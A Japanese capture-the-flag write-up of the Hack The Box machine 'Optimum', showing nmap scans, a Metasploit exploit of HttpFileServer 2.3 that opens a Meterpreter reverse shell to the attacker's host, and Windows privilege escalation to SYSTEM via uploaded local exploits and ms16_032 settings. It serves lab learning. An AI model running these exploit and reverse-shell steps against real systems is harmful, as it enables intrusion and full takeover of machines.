はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。
nmap する
kali@kali:~$ nmap -A 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:43 EST
Nmap scan report for 10.10.10.8
Host is up (0.18s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.84 seconds空いてるポートが少ないですね。
kali@kali:~$ nmap -A -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:49 EST
Nmap scan report for 10.10.10.8
Host is up (0.19s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 427.35 seconds-p-オプションをつけてもこれ以上発見できませんでした。
searchsploit
kali@kali:~$ searchsploit HttpFileServer
Exploits: No Result
Shellcodes: No Result
Papers: No Result何も出ません。
metasploit で search する
kali@kali:~$ msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search httpfileserver
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution1 つ出てきました。
見つけた exploit を使って user.txt をとる
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > use rhosts 10.10.10.8
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/gprs/gtp_echo normal No GTP Echo Scanner
1 auxiliary/scanner/http/owa_ews_login normal No OWA Exchange Web Services (EWS) Login Scanner
2 auxiliary/scanner/llmnr/query normal No LLMNR Query
3 exploit/windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution
msf5 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.10.8
rhosts => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.5
srvhost => 10.10.14.5
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Using URL: http://10.10.14.5:8080/sKkpP5u
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /sKkpP5u
[*] Sending stage (180291 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.8:49170) at 2020-02-24 00:46:29 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\XCPQQX.vbs' on the target
meterpreter >
[!] Tried to delete %TEMP%\XCPQQX.vbs, unknown result
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1408 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
C:\Users\kostas\Desktop>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\kostas\Desktop
01/03/2020 04:58 �� <DIR> .
01/03/2020 04:58 �� <DIR> ..
01/03/2020 04:58 �� <DIR> %TEMP%
18/03/2017 02:11 �� 760.320 hfs.exe
18/03/2017 02:13 �� 32 user.txt.txt
2 File(s) 760.352 bytes
3 Dir(s) 31.899.504.640 bytes free
C:\Users\kostas\Desktop>more user.txt.txt
more user.txt.txtはい、取れました。
ここまでは簡単でしたね
suggester を使う準備
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windowssysinfo で出てくる Architecture と Meterpreter を合わせます。
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
228 4 smss.exe
336 328 csrss.exe
392 328 wininit.exe
400 384 csrss.exe
444 384 winlogon.exe
484 392 services.exe
492 392 lsass.exe
528 484 spoolsv.exe
552 484 svchost.exe
576 484 VGAuthService.exe
580 484 svchost.exe
668 444 dwm.exe
676 484 svchost.exe
704 484 svchost.exe
764 484 svchost.exe
776 1228 conhost.exe x64 1 OPTIMUM\kostas C:\Windows\System32\conhost.exe
836 484 svchost.exe
960 484 svchost.exe
984 484 svchost.exe
1032 484 vmtoolsd.exe
1068 484 ManagementAgentHost.exe
1228 1360 cmd.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\cmd.exe
1360 2540 vCzZEigoafP.exe x86 1 OPTIMUM\kostas C:\Users\kostas\AppData\Local\Temp\radF88CD.tmp\vCzZEigoafP.exe
1424 484 svchost.exe
1444 548 cmd.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\cmd.exe
1512 484 dllhost.exe
1632 552 WmiPrvSE.exe
1724 484 msdtc.exe
2088 704 taskhostex.exe x64 1 OPTIMUM\kostas C:\Windows\System32\taskhostex.exe
2160 2124 explorer.exe x64 1 OPTIMUM\kostas C:\Windows\explorer.exe
2540 2692 wscript.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\wscript.exe
2664 2160 vmtoolsd.exe x64 1 OPTIMUM\kostas C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2692 2160 hfs.exe x86 1 OPTIMUM\kostas C:\Users\kostas\Desktop\hfs.exe
2948 1444 conhost.exe x64 1 OPTIMUM\kostas C:\Windows\System32\conhost.exe
meterpreter > migrate 2948
[*] Migrating from 1360 to 2948...
[*] Migration completed successfully.suggester を使う
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 13 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 13 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
Microsoft Windows allows for the automatic loading of a profiling
COM object during the launch of a CLR process based on certain
environment variables ostensibly to monitor execution. In this case,
we abuse the profiler by pointing to a payload DLL that will be
launched as the profiling thread. This thread will run at the
permission level of the calling process, so an auto-elevating
process will launch the DLL with elevated permissions. In this case,
we use gpedit.msc as the auto-elevated CLR process, but others would
work, too.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
This module will bypass Windows UAC by hijacking a special key in
the Registry under the current user hive, and inserting a custom
command that will get invoked when Window backup and restore is
launched. It will spawn a second shell that has the UAC flag turned
off. This module modifies a registry key, but cleans up the key once
the payload has been invoked.
[*] Post module execution completedsuggester が教えてくれたものたちを使う
どちらも使って見ました。。が、失敗します。 ここでドン詰まりした僕は Ippsec の writeup をみてみました。
すると、
Ippsec「一応 32bit、64bit 両方で suggester 試しといた方がええで」
ほぇーー
32bit でも suggester 使ってみる
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 29 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
This module will bypass Windows UAC by hijacking a special key in
the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows Event Viewer is
launched. It will spawn a second shell that has the UAC flag turned
off. This module modifies a registry key, but cleans up the key once
the payload has been invoked. The module does not require the
architecture of the payload to match the OS. If specifying
EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
This module exploits the lack of sanitization of standard handles in
Windows' Secondary Logon Service. The vulnerability is known to
affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This
module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
[*] Post module execution completedなんか新しいのが出てきました。
exploit/windows/local/ms16_032_secondary_logon_handle_privescの方には
The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit.
64 bit の方にも使えるって書いてありますね。
ms16032secondarylogonhandle_privesc を使う
色々設定して run しますが、
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.5:4445
[*] Writing payload file, C:\Users\kostas\Desktop\ClIsvyuBDazH.txt...
[*] Compressing script contents...
[+] Compressed size: 3640
[*] Executing exploit script...
options
[+] Cleaned up C:\Users\kostas\Desktop\ClIsvyuBDazH.txt
[*] Exploit completed, but no session was created.失敗します。 調べてみるとこれでうまく行っている writeup も多いのですが、謎です。
完璧に Ippsec と同じことをしても失敗しました。
なので方針を変更します。
Windows-Exploit-Suggester の使用
以下の writeup を参考に進めていきます。 https://alamot.github.io/optimum_writeup/
Windows-Exploit-Suggester は windows 上で systeminfo コマンドを実行することで出力される内容を元に exploit を suggestion してくれます。便利。
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
git cloneしてから
kali@kali:~/Windows-Exploit-Suggester$ ./windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2020-02-24-mssb.xls
[*] done
kali@kali:~/Windows-Exploit-Suggester$ python -m pip install xlrd --upgradeで環境が整います。
前述の通り、Windows-Exploit-Suggesterには systeminfo の情報が必要になります。
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > shell
Process 2072 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>systeminfo
systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ��
System Boot Time: 2/3/2020, 12:41:56 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.452 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.649 MB
Virtual Memory: In Use: 854 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.この systeminfo で出力される内容を systeminfo.txt として保存します。
そして
kali@kali:~/Windows-Exploit-Suggester$ python2 windows-exploit-suggester.py --database 2020-02-24-mssb.xls --systeminfo ../systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-1)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical上から試してみる
uploadというコマンドが meterpreter では使用できます。
上から順次試してみます。
meterpreter > upload cve-2016-7255.exe
[*] uploading : cve-2016-7255.exe -> cve-2016-7255.exe
[*] Uploaded 132.50 KiB of 132.50 KiB (100.0%): cve-2016-7255.exe -> cve-2016-7255.exe
[*] uploaded : cve-2016-7255.exe -> cve-2016-7255.exe
meterpreter > shell
Process 1564 created.
Channel 9 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cve-2016-7255.exe
cve-2016-7255.exe
Please enter an OS version
The following OS'es are supported:
[*] 7 - Windows 7
[*] 81 - Windows 8.1
[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)
[*] 12 - Windows 2012 R2
[*] For example: cve-2016-7255.exe 7 -- for Windows 7
C:\Users\kostas\Desktop>cve-2016-7255.exe 12動きませんでした。
2 つ目いきます
meterpreter > upload 41020.exe
[*] uploading : 41020.exe -> 41020.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
[*] uploaded : 41020.exe -> 41020.exe
meterpreter > shell
Process 2552 created.
Channel 6 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\systemお!行けました
これで root.txt を取れます
終わりに
suggester を使う方法は失敗こそしましたが、割と方針は合っていたぽかったので良かったです。(いまだになんで失敗したのか謎)
何かの手段が失敗した時に代替として使える手段をいっぱい持っておきたいところです…
その他
https://blog.artis3nal.com/2020-02-16-htb-optimum-msf/
- autorecon を使ってる
(3/13 追記)suggest されたやつ使えなかった問題について
ms16-032のexploitが成功してない理由ですが、おそらくmeterpreterのペイロードがx86になっていて、OSのx64とズレてるからだと思います。
— 高林 (@1eDVeCw6hdSLhzB) March 12, 2020
windows/x64/meterpreter/reverse_tcpを使えばうまく行くと思います!
自分はx64のシェル上で修正したps1のms16-032 exploitでSYSTEMのリバースシェル取れました
windows/http/rejetto_hfs_execの payload を windows/x64/meterpreter/reverse_tcp にして、
windows/local/ms16_032_secondary_logon_handle_privescを以下のように設定することで成功しました!
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows x64ちなみに Ippsec もこの方法で root を取っています。Ippsec と同様の方法を試した記憶があるのですが、おそらくどこかでミスっていたものと。。
@高林さんありがとうございます!
